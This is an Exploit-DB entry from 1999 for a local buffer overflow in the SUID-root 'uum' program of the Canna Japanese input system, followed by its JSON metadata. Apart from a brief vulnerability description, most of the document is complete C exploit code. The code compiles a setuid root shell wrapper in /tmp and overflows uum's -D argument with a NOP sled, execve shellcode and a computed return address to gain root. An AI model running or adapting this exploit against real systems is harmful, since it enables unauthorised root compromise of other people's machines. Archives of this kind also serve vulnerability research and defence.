IRIX 6.5 / Solaris 7.0 / Turbolinux 4.2 - 'uum' Local Buffer Overflow
1999-11-02T00:00:00
ID EDB-ID:19582 Type exploitdb Reporter UNYUN Modified 1999-11-02T00:00:00
Description
// source: https://www.securityfocus.com/bid/757/info
Canna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese.
Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romanji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way.
Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.
The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'uum' program. Uum is a Japanese input tty frontend for Canna. Regrettably, certain versions are vulnerable to a buffer overflow attack via unchecked user supplied data with the '-D' option. Since 'uum' is installed as SUID root this may result in a root level compromise.
/*=============================================================================
/usr/bin/uum Exploit for Linux
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by
UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdlib.h>
#include <stdio.h>
#define RET_ADR 84
#define EXP_ADR 204
#define MAXBUF 300
#define JMP_OFS 0x484
#define NOP 0x90
#define SHELL "/tmp/pp"
#define COMPILER "gcc"
char exec[60]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff";
char xx[MAXBUF+1];
unsigned int i,ip,sp;
FILE *fp;
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
main()
{
strcat(exec,SHELL);
sprintf(xx,"%s.c",SHELL);
if ((fp=fopen(xx,"w"))==NULL){
printf("Can not write to %s\n",xx);
exit(1);
}
fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
fclose(fp);
sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
system(xx);
sp=get_sp();
memset(xx,NOP,MAXBUF);
ip=sp-JMP_OFS;
printf("Jumping address = %x\n",ip);
xx[RET_ADR ]=ip&0xff;
xx[RET_ADR+1]=(ip>>8)&0xff;
xx[RET_ADR+2]=(ip>>16)&0xff;
xx[RET_ADR+3]=(ip>>24)&0xff;
strncpy(xx+EXP_ADR,exec,strlen(exec));
xx[MAXBUF]=0;
execl("/usr/bin/uum","uum","-D",xx,(char *) 0);
}
{"id": "EDB-ID:19582", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "IRIX 6.5 / Solaris 7.0 / Turbolinux 4.2 - 'uum' Local Buffer Overflow", "description": "", "published": "1999-11-02T00:00:00", "modified": "1999-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/19582", "reporter": "UNYUN", "references": [], "cvelist": ["1999-0948"], "immutableFields": [], "lastseen": "2022-01-13T06:39:03", "viewCount": 10, "enchantments": {"dependencies": {}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/19582", "sourceData": "// source: https://www.securityfocus.com/bid/757/info\r\n\r\nCanna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese.\r\n\r\nCanna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romanji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way.\r\n\r\nCanna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.\r\n\r\nThe Canna subsystem on certain UNIX versions contains a buffer overflow in the 'uum' program. Uum is a Japanese input tty frontend for Canna. Regrettably, certain versions are vulnerable to a buffer overflow attack via unchecked user supplied data with the '-D' option. Since 'uum' is installed as SUID root this may result in a root level compromise. \r\n\r\n/*=============================================================================\r\n /usr/bin/uum Exploit for Linux \r\n The Shadow Penguin Security (http://shadowpenguin.backsection.net)\r\n Written by\r\n UNYUN (shadowpenguin@backsection.net)\r\n =============================================================================\r\n*/\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n#define RET_ADR 84\r\n#define EXP_ADR 204\r\n#define MAXBUF 300\r\n#define JMP_OFS 0x484\r\n#define NOP 0x90\r\n#define SHELL \"/tmp/pp\"\r\n#define COMPILER \"gcc\"\r\n\r\nchar exec[60]= \r\n \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n \"\\x80\\xe8\\xdc\\xff\\xff\\xff\";\r\n\r\nchar xx[MAXBUF+1];\r\nunsigned int i,ip,sp;\r\nFILE *fp;\r\n\r\n\r\nunsigned long get_sp(void)\r\n{\r\n__asm__(\"movl %esp, %eax\");\r\n}\r\n\r\nmain()\r\n{\r\n strcat(exec,SHELL);\r\n sprintf(xx,\"%s.c\",SHELL);\r\n if ((fp=fopen(xx,\"w\"))==NULL){\r\n printf(\"Can not write to %s\\n\",xx);\r\n exit(1);\r\n }\r\n fprintf(fp,\"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\");\r\n fclose(fp);\r\n sprintf(xx,\"%s %s.c -o %s\",COMPILER,SHELL,SHELL);\r\n system(xx);\r\n\r\n sp=get_sp();\r\n memset(xx,NOP,MAXBUF);\r\n ip=sp-JMP_OFS;\r\n printf(\"Jumping address = %x\\n\",ip);\r\n xx[RET_ADR ]=ip&0xff;\r\n xx[RET_ADR+1]=(ip>>8)&0xff;\r\n xx[RET_ADR+2]=(ip>>16)&0xff;\r\n xx[RET_ADR+3]=(ip>>24)&0xff;\r\n strncpy(xx+EXP_ADR,exec,strlen(exec));\r\n xx[MAXBUF]=0;\r\n execl(\"/usr/bin/uum\",\"uum\",\"-D\",xx,(char *) 0);\r\n}", "osvdbidlist": ["9822"], "exploitType": "local", "verified": true, "_state": {"dependencies": 1646601907}}